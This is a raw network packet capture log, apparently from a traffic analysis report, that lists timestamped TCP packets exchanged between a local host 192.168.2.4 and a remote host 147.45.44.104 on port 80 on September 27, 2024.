                                                                                    Sep 27, 2024 00:15:06.567960024 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.567981958 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.568006992 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.568763018 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.568778992 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.568793058 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.568821907 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.568854094 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.568871975 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.568886042 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.568900108 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.568913937 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.568943977 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.568978071 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.569737911 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.569753885 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.569767952 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.569797039 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.569818974 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.569833994 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.569848061 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.569861889 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.569875956 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.569885015 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.569905043 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.569936037 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.570672035 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.570688963 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.570703030 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.570741892 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.570750952 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.570765972 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.570770979 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.570781946 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.570797920 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.570802927 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.570846081 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.571613073 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.571628094 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.571641922 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.571707010 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.571721077 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.571733952 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.571748018 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.571765900 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.571765900 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.571765900 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.571784019 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.571803093 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.572526932 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.572544098 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.572559118 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.572592974 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.572624922 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.572632074 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.572640896 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.572654963 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.572669029 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.572671890 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.572696924 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.572729111 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.573390961 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.573452950 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.573452950 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.573467970 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.573532104 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.573533058 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.573546886 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.573560953 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.573575020 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.573585987 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.573626995 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.575171947 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.575186968 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.575201988 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.575232983 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.575258970 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.592993021 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.593079090 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.656331062 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.656347990 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.656362057 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.656403065 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.656424046 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.656430960 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.656445026 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.656460047 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.656474113 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.656476021 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.656490088 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.656510115 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.656538963 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.656591892 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.656606913 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.656621933 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.656634092 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.656636000 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.656651974 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.656666994 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.656685114 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.656723022 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.656857014 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.656902075 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.656924963 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.656939983 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.656976938 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.657006979 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.657006025 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.657032013 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.657063961 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.657092094 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.657181025 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.657196999 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.657212019 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.657232046 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.657258034 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.657465935 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.657480001 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.657494068 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.657507896 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.657516956 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.657524109 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.657558918 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.657588959 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.657618046 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.657634020 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.657648087 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.657661915 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.657665968 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.657676935 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.657691002 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.657691956 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.657706022 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.657720089 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.657727003 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.657735109 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.657752037 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.657752037 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.657773972 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.657795906 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.658073902 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.658098936 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.658119917 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.658123016 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.658149004 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.658170938 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.658188105 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.658202887 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.658216953 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.658231020 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.658231974 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.658257008 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.658281088 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.658390999 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.658406019 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.658420086 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.658433914 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.658437967 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.658447981 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.658463001 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.658477068 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.658477068 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.658519983 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.658535004 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.658740997 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.658788919 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.658798933 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.658813953 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.658843040 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.658862114 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.658889055 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.658902884 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.658917904 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.658931971 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.658935070 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.658948898 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.658960104 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.659003973 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.663297892 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.663347960 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.663367033 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.663382053 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.663413048 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.663446903 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.663449049 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.663500071 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.663506985 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.663548946 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.663563013 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.663597107 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.663628101 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.663629055 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.663654089 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.663661957 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.663669109 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.663707018 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.663711071 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.663750887 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.663762093 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.663785934 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.663795948 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.663820982 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.663831949 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.663856030 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.663872957 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.663888931 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.663906097 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.663921118 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.663930893 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.663954973 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.663971901 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.663990021 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.664002895 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.664036036 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.665699959 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.665733099 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.665779114 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.665797949 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.665805101 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.665838003 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.665860891 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.665870905 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.665890932 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.665903091 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.665935993 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.665940046 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.665951014 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.665970087 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.665985107 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.666019917 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.666019917 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.666053057 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.666069031 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.666085005 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.666109085 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.666119099 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.666135073 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.666151047 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.666162968 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.666186094 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.666201115 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.666222095 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.666235924 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.666268110 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.666271925 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.666305065 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.666332960 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.666338921 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.666352034 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.666371107 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.666387081 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.666404009 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.666421890 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.666435957 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.666448116 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.666469097 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.666484118 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.666501045 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.666521072 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.666533947 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.666551113 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.666565895 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.666584015 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.666599989 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.666621923 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.666630983 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.666646957 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.666662931 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.666676044 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.666697025 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.666728973 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.666763067 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.666780949 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.666780949 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.666780949 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.666790962 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.666811943 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.666840076 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.746197939 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.746212959 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.746227026 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.746344090 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.746350050 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.746365070 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.746378899 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.746393919 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.746401072 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.746417046 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.746431112 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.746438980 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.746447086 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.746462107 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.746470928 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.746484995 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.746500015 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.746521950 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.746551037 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.746553898 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.746566057 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.746579885 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.746609926 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.746630907 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.746645927 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.746645927 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.746685982 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.746714115 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.746728897 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.746750116 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.746762991 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.746776104 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.746777058 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.746790886 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.746802092 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.746825933 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.746862888 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.746879101 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.746893883 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.746908903 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.746923923 CEST8049764147.45.44.104192.168.2.4
